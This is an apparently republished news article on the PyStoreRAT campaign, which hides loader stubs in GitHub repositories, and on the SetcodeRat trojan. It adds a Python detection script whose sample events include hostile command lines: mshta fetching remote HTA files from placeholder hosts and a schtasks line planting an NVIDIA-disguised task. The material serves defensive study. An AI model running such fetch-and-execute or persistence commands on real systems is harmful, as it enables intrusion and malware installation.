Cybersecurity researchers are calling attention to a new campaign that leverages GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.
GitHub Repositories Used as a Malware Delivery Vehicle
“These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report.
Researchers describe PyStoreRAT as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. In addition, the malware deploys an information stealer known as Rhadamanthys as a follow-on payload.
Attack chains rely on Python or JavaScript loader stubs embedded in GitHub repositories that masquerade as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities. These lures deliberately appeal to analysts and developers.
The earliest signs of the campaign date back to mid-June 2025, followed by a steady stream of repositories published since then. Threat actors promote these tools through social media platforms such as YouTube and X. At the same time, they artificially inflate repository star and fork metrics, a technique reminiscent of the Stargazers Ghost Network.
The threat actors behind the campaign publish the repositories from either newly created GitHub accounts or accounts that had been dormant for months. Only later, once a tool has gained traction and reached GitHub's trending lists, do they slip the malicious payload in through innocuous-looking "maintenance" commits, in October and November 2025.
Many of the tools do not actually work as advertised. Some display only static menus or non-interactive interfaces, while others perform minimal placeholder operations. The functionality is beside the point: the attackers trade on the implicit trust users place in GitHub to get the loader stub executed, and that stub initiates the infection chain.
HTA Payload Execution and System Profiling Capabilities
Running the loader stub triggers the execution of a remote HTML Application (HTA) payload, which in turn delivers PyStoreRAT. The malware profiles the system, checks for administrator privileges, and scans for cryptocurrency wallet-related files associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
Before that, the loader stub enumerates the installed antivirus products and checks the names for the strings "Falcon" (CrowdStrike Falcon) or "Reason" (Cybereason or ReasonLabs), likely in an attempt to reduce visibility. If either product is present, it launches "mshta.exe" indirectly via "cmd.exe"; otherwise it executes "mshta.exe" directly. In both cases the observable artifact is the same: a script host spawned by the Python or JavaScript stub with a remote HTA URL on its command line.
The malware establishes persistence by creating a scheduled task disguised as an NVIDIA app self-update. In the final stage, it contacts an external server to retrieve commands for execution on the infected host. Supported commands include:
- Download and execute EXE payloads, including Rhadamanthys
- Download and extract ZIP archives
- Download a malicious DLL and execute it using “rundll32.exe”
- Fetch raw JavaScript code and execute it dynamically in memory using eval()
- Download and install MSI packages
- Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
- Execute PowerShell commands directly in memory
- Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
- Delete the scheduled task to remove the forensic trail
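The behaviors listed above (a loader handing a remote HTA URL to mshta.exe, possibly through cmd.exe; mshta.exe spawning rundll32.exe or a second mshta.exe; a scheduled task with an NVIDIA-themed name) are all visible in process-creation telemetry. The following is an added example of a small rule set over such events; it is not code from Morphisec or from the article. The event fields (parent image, image, command line) are a constructed Sysmon-like subset, the sample events and URLs are made up, and the rule names and thresholds are the author's own assumptions rather than anything the report specifies.

```python
"""Added example: flag the PyStoreRAT execution chain in process-creation events.

Assumptions (not from the report): a minimal Sysmon-like event with parent image,
image and command line; the sample events below are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Script hosts that the report says PyStoreRAT uses to run its modules.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# Parents from which a first-stage mshta.exe with a remote URL is suspicious:
# the Python/JS stub itself, cmd.exe (the Falcon/Reason branch) and mshta.exe (chaining).
LOADER_PARENTS = {"python.exe", "pythonw.exe", "node.exe", "cmd.exe", "mshta.exe"}


def _basename(path: str) -> str:
    """Case-insensitive file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches; an empty list means clean."""
    parent, image, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line
    hits: list[str] = []
    # Rule 1: loader stub (directly or via cmd.exe) runs mshta.exe against a remote HTA.
    if image == "mshta.exe" and parent in LOADER_PARENTS and URL_RE.search(cmd):
        hits.append("remote_hta_from_loader")
    # Rule 2: a script host launches rundll32.exe (the DLL-module command).
    if image == "rundll32.exe" and parent in SCRIPT_HOSTS:
        hits.append("rundll32_from_script_host")
    # Rule 3: a script host creates a scheduled task with an NVIDIA-themed name.
    # Assumes schtasks.exe is used; task creation via the Schedule.Service COM
    # object would instead show up in TaskScheduler/Security task-creation logs.
    if (image == "schtasks.exe" and parent in SCRIPT_HOSTS
            and re.search(r"/create", cmd, re.IGNORECASE)
            and re.search(r"nvidia", cmd, re.IGNORECASE)):
        hits.append("nvidia_lookalike_task")
    # Rule 4: mshta.exe spawning another mshta.exe to load further HTA modules.
    if image == "mshta.exe" and parent == "mshta.exe":
        hits.append("mshta_chain")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Run detect() over a batch and return (index, rule hits) for each flagged event."""
    results = []
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry; hosts and paths are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\dev\AppData\Local\Programs\Python\Python312\python.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://example.invalid/update.hta"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/update.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\dev\AppData\Local\Temp\mod.dll,Start"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /Create /SC HOURLY /TN "NVIDIA App SelfUpdate" /TR "mshta.exe https://example.invalid/p.hta"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\ui.hta"'),   # benign local HTA
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/second.hta"),
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
```

Rule 1 deliberately keys on the parent process rather than on the Falcon/Reason branch, since both branches end with mshta.exe holding a URL; only the parent differs. The benign local-HTA event shows why the URL check matters: mshta.exe itself is a legitimate binary and should not be alerted on unconditionally.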
Attribution and Threat Actor Assessment
Researchers have not identified the operators behind the campaign. However, Morphisec noted that Russian-language artifacts and coding patterns point to a likely Eastern European threat actor.
“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.”
Meanwhile, the disclosure follows a separate report from Chinese security vendor QiAnXin, which detailed another remote access trojan (RAT) codenamed SetcodeRat that has likely spread across the country since October 2025 through malvertising lures. According to the company, the campaign infected hundreds of computers, including systems belonging to governments and enterprises, within a single month.
“The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said. “If it is not in the Chinese-speaking area, it will automatically exit.”
The malware disguises itself as legitimate installers for popular programs such as Google Chrome and advances to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), or Taiwan (Zh-TW). It also terminates execution if it fails to connect to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”).
In the next stage, the malware launches an executable named “pnm2png.exe” to sideload “zlib1.dll.” The DLL then decrypts the contents of a file named “qt.conf” and executes it. The decrypted payload consists of a DLL that embeds the RAT. SetcodeRat can connect to either Telegram or a traditional command-and-control (C2) server to retrieve instructions and carry out data theft.
The malware enables attackers to take screenshots, log keystrokes, read and modify folders, start processes, run “cmd.exe,” establish socket connections, collect system and network information, and update itself to newer versions.
Source: TheHackerNews